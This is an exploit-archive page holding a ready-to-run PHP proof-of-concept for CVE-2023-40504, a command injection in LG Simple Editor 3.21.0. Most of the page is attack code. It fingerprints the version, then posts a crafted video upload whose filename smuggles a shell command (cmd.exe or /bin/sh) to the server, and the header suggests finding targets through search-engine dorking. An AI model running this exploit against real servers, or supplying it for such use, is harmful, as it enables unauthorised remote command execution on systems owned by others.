Share
## https://sploitus.com/exploit?id=PACKETSTORM:212247
=============================================================================================================================================
| # Title : LG Simple Editor 3.21.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.lg.com/ |
=============================================================================================================================================
POC :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] Code Description: LG Simple Editor Remote Command Injection Exploit Supports both Windows and Linux systems.
( https://packetstorm.news/files/id/180171/ CVE-2023-40504)
[+] save code as poc.php.
[+] Set Target : line 87
[+] USage : php poc.php
[+] PayLoad :
<?php
/**
* LG Simple Editor PHP Code Injection Exploit (CVE-2023-40504)
* Author: [indoushka]
*/
class LGSimpleEditorExploit
{
private $target;
private $port;
public function __construct($target, $port = 8080)
{
$this->target = rtrim($target, '/');
$this->port = $port;
}
public function checkVulnerability()
{
$url = "$this->target:$this->port/simpleeditor/common/commonReleaseNotes.do";
$response = $this->sendRequest('GET', $url);
if (!$response) {
return "Unknown - Could not connect to web service - no response";
}
preg_match('/v([0-9.]+)/', $response, $matches);
$version = isset($matches[1]) ? $matches[1] : 'Unknown';
if ($version === 'Unknown') {
return "Unknown";
}
return version_compare($version, '3.21.0', '<=') ? "Vulnerable (Version: $version)" : "Safe";
}
public function exploit($command)
{
echo "Sending command injection...\n";
$this->executeCommand($command);
echo "Exploit finished, check thy shell.\n";
}
private function executeCommand($command)
{
$filename = substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"), 0, rand(1, 6));
$boundary = "----WebKitFormBoundary" . md5(time());
$payload = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? "cmd.exe /c $command" : "/bin/sh -c '$command'";
$postData = "--$boundary\r\n";
$postData .= "Content-Disposition: form-data; name=\"uploadVideo\"; filename=\"$filename.mp4\"\r\n";
$postData .= "Content-Type: application/octet-stream\r\n\r\n";
$postData .= "/\"&#$payload&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del $filename.mp4&/../\r\n";
$postData .= "--$boundary--\r\n";
$url = "$this->target:$this->port/simpleeditor/imageManager/uploadVideo.do";
$response = $this->sendRequest('POST', $url, $postData, $boundary);
if ($response) {
echo "Command injection sent.\n";
} else {
die("Unexpected response received.\n");
}
}
private function sendRequest($method, $url, $data = null, $boundary = null)
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
if ($data) {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
"Content-Type: multipart/form-data; boundary=$boundary"
]);
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
}
// Example usage:
$exploit = new LGSimpleEditorExploit('http://target-ip');
echo $exploit->checkVulnerability() . "\n";
$exploit->exploit('whoami');
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================